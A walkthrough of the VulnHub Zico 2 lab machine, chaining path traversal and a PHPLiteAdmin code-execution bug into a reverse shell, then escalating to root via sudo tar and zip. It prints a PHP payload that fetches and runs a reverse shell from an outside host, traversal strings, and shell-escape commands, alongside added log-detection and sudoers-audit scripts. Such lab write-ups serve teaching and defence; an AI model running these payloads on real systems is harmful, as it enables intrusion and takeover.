
VulnHub – Zico 2 Walkthrough

Introduction

This was an easy Linux machine that involved chaining a path traversal vulnerability and a PHP remote code execution vulnerability affecting two web applications to gain initial access, and abusing Sudo permissions on the Tar and Zip binaries to escalate privileges to root.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, using the following flags:

  • -sC to run default scripts
  • -sV to enumerate application versions

The scan has identified three open ports: port 22 (SSH), port 80 (HTTP), and port 111 (RPC). The next step will be to start enumerating HTTP.

Enumerating HTTP

When accessing the site through a browser, the following page is displayed:

When navigating to Tools, it looks like the “page” parameter may be vulnerable to path traversal.

When using the following value, it was possible to access the local /etc/passwd file:

../../.././../etc/passwd

This could not be exploited through log poisoning, as the logs did not seem to be located in the default directory, and remote file inclusion did not work either.

The next step is to run a scan to find hidden files or directories using Wfuzz, with the following flags:

  • --hc to exclude certain response codes
  • -w to specify the word list to use
  • the URL to scan, using FUZZ to mark the part to fuzz

WFuzz has identified a “dbadmin” entry; when navigating to it, a PHPLiteAdmin portal is displayed:

As it turned out, the default “admin” password was still in use:

The version appears to be v1.9.3. Using the SearchSploit tool to identify known vulnerabilities affecting this specific version:

It appears this version is affected by a remote code execution vulnerability that allows an attacker to create arbitrary PHP files on the server by creating a new database and inserting a new field with PHP code as its default value:

phpliteadmin.php#1784: 'Creating a New Database' => 
phpliteadmin.php#1785: 'When you create a new database, the name you entered will be appended with the appropriate file extension (.db, .db3, .sqlite, etc.) if you do not include it yourself. The database will be created in the directory you specified as the $directory variable.',

An Attacker can create a sqlite Database with a php extension and insert PHP Code as text fields. When done the Attacker can execute it simply by accessing the database file with the Webbrowser.

Proof of Concept:

1. We create a db named "hack.php".
(Depending on Server configuration sometimes it will not work and the name for the db will be "hack.sqlite". Then simply try to rename the database / existing database to "hack.php".)
The script will store the sqlite database in the same directory as phpliteadmin.php.
Preview: http://goo.gl/B5n9O
Hex preview: http://goo.gl/lJ5iQ

2. Now create a new table in this database and insert a text field with the default value:
<?php phpinfo()?>
Hex preview: http://goo.gl/v7USQ

3. Now we run hack.php

Done!

Exploiting PHPLiteAdmin Remote Code Execution

Creating a new “hack.php” database:

Adding a new “test” table with one “test” integer field, using a value of “<?php phpinfo()?>”:

When navigating to the “hack.php” file created by the exploit above through the path traversal vulnerability found earlier, phpinfo() is executed:

Copying the Laudanum PHP Reverse Shell to the current directory and changing the IP address and port:

Setting up a Python Simple HTTP Server to host it:

Dropping the existing table and creating a new one, containing one field with the following value, which will download and execute the PHP reverse shell:

<?php system("wget 10.0.0.158:8000/php-reverse-shell.php -O /tmp/reverse-shell.php; php /tmp/reverse-shell.php"); ?>')

The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

Upon navigating to the hack.php file again, a reverse shell as the www-data user is received:
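As an added example from the defender's side, not part of the original walkthrough, the following script shows detection logic for the two request patterns this chain leaves in a web-server access log: a “page” parameter carrying “../” (plain or URL-encoded), and a “page” parameter that includes a .php file, the way hack.php was reached. The log lines, client addresses and the /view.php script name are constructed for the example; the parameter name and the /dbadmin/ path come from the walkthrough.

```shell
#!/bin/sh
# Added example (not from the walkthrough): flag the traversal and the
# PHP-file inclusion this chain performs through the "page" parameter.
# Log lines, client addresses and /view.php are constructed; "page" and
# /dbadmin/ are taken from the walkthrough.

SAMPLE_LOG='10.0.0.158 - - [01/Jan/2024:10:00:00 +0000] "GET /view.php?page=tools.html HTTP/1.1" 200 512
10.0.0.158 - - [01/Jan/2024:10:00:05 +0000] "GET /view.php?page=../../.././../etc/passwd HTTP/1.1" 200 1640
10.0.0.158 - - [01/Jan/2024:10:00:09 +0000] "GET /view.php?page=..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1640
10.0.0.158 - - [01/Jan/2024:10:01:00 +0000] "GET /dbadmin/ HTTP/1.1" 200 3010
10.0.0.158 - - [01/Jan/2024:10:02:30 +0000] "GET /view.php?page=dbadmin/hack.php HTTP/1.1" 200 90
10.0.0.12 - - [01/Jan/2024:10:03:00 +0000] "GET /view.php?page=../../etc/hostname HTTP/1.1" 200 20
10.0.0.12 - - [01/Jan/2024:10:03:05 +0000] "GET /index.html HTTP/1.1" 200 1024'

# Lines whose page= value contains "../", "..%2f" or the double-encoded
# "..%252f" (case-insensitive). Reads stdin, writes matches to stdout.
find_traversal() {
    grep -iE 'page=[^ &]*(\.\./|\.\.%2f|\.\.%252f)' || true
}

# Lines whose page= value ends in .php, i.e. server-side code being
# included through the parameter instead of a static page.
find_php_inclusion() {
    grep -iE 'page=[^ &]*\.php([ &]|$)' || true
}

# Number of SAMPLE_LOG lines matched by the finder function named in $1.
count_hits() {
    printf '%s\n' "$SAMPLE_LOG" | "$1" | wc -l | tr -d ' '
}

# Client addresses showing both signals: the shape of the complete chain
# (read a local file, then include an attacker-created .php the same way).
chained_sources() {
    printf '%s\n' "$SAMPLE_LOG" | find_traversal | cut -d' ' -f1 | sort -u |
    while read -r ip; do
        if printf '%s\n' "$SAMPLE_LOG" | find_php_inclusion | grep -q "^$ip "; then
            printf '%s\n' "$ip"
        fi
    done
}

echo "Traversal attempts: $(count_hits find_traversal)"
echo "PHP inclusion attempts: $(count_hits find_php_inclusion)"
echo "Sources showing the full chain:"; chained_sources
```

On a real host, replace SAMPLE_LOG with the web server's access log; the fix on the application side is to map “page” to an allowlist of known files rather than passing it to include().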

Privilege Escalation

When inspecting the wp-config.php file, which usually contains database connection credentials, a password is found:

As it turns out, the password was re-used for the “zico” user present on the box:

When executing sudo -l, it appears the current user can execute Tar and Zip as root:

Upon consulting GTFOBins, it appears tar can be exploited when run with sudo. Tar has an argument called --checkpoint, which displays a “progress” message every time a given number of files has been archived. This can be used in combination with the --checkpoint-action flag, which executes an action, in the form of a binary or script, whenever a checkpoint is reached.

Executing the following command, which runs /bin/sh as soon as Tar reaches its first checkpoint:

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

This has granted root-level access to the machine. Another way to escalate privileges is through Zip:

The following command exploits the -TT argument, which allows a command to be run to test the archive once it has been written; $TF holds a temporary file name for the archive:

sudo zip $TF /etc/hosts -T -TT 'sh #'
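As an added example, not taken from the walkthrough or from GTFOBins, the following script audits sudo rules for the kind of entry that made both escalations possible: a non-root user allowed to run tar or zip as root. The sudoers content is constructed for the example; the zico user name comes from the walkthrough.

```shell
#!/bin/sh
# Added example (not from the walkthrough): audit sudo rules for binaries that
# can spawn a shell when run under sudo, which on this box are tar
# (--checkpoint-action) and zip (-TT). The sudoers content is constructed;
# the user name "zico" comes from the walkthrough.

SAMPLE_SUDOERS='Defaults env_reset
root ALL=(ALL:ALL) ALL
zico ALL=(root) NOPASSWD: /bin/tar, /usr/bin/zip
%admin ALL=(ALL) /usr/bin/apt-get
backup ALL=(root) NOPASSWD: /usr/local/bin/backup.sh'

# Binaries known to break out to a shell under sudo (the subset this box uses).
RISKY_BINS='tar zip'

# Read sudoers-format lines on stdin and print one "<user> <command>" finding
# per risky command, skipping comments, Defaults lines and rules for root.
audit_sudo_rules() {
    grep -vE '^[[:space:]]*(#|Defaults|root[[:space:]])' |
    grep -E '^[^[:space:]]+[[:space:]]+.*=' |
    while read -r line; do
        user=${line%%[[:space:]]*}
        # The command list follows the last '=', an optional "(runas)" spec
        # and, when a tag such as NOPASSWD: is present, the last ':'.
        cmds=${line##*=}; cmds=${cmds#\(*\)}; cmds=${cmds##*:}
        # Commands are comma-separated; compare each one by its basename.
        printf '%s\n' "$cmds" | tr ',' '\n' | while read -r cmd; do
            base=${cmd##*/}
            for risky in $RISKY_BINS; do
                if [ "$base" = "$risky" ]; then
                    printf '%s %s\n' "$user" "$cmd"
                fi
            done
        done
    done
}

# Number of findings in SAMPLE_SUDOERS; a monitoring job can alert when > 0.
count_findings() {
    printf '%s\n' "$SAMPLE_SUDOERS" | audit_sudo_rules | wc -l | tr -d ' '
}

echo "Sudo rules granting shell-capable binaries:"
printf '%s\n' "$SAMPLE_SUDOERS" | audit_sudo_rules
```

On a real host, feed it /etc/sudoers and the files under /etc/sudoers.d/ instead of the sample; the remediation is to remove such rules or to replace the binary with a wrapper script that takes no user-controlled arguments.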

Conclusion

This was a really interesting box and a very good example of how multiple vulnerabilities that would normally not produce much of a result can often be chained together to obtain remote code execution.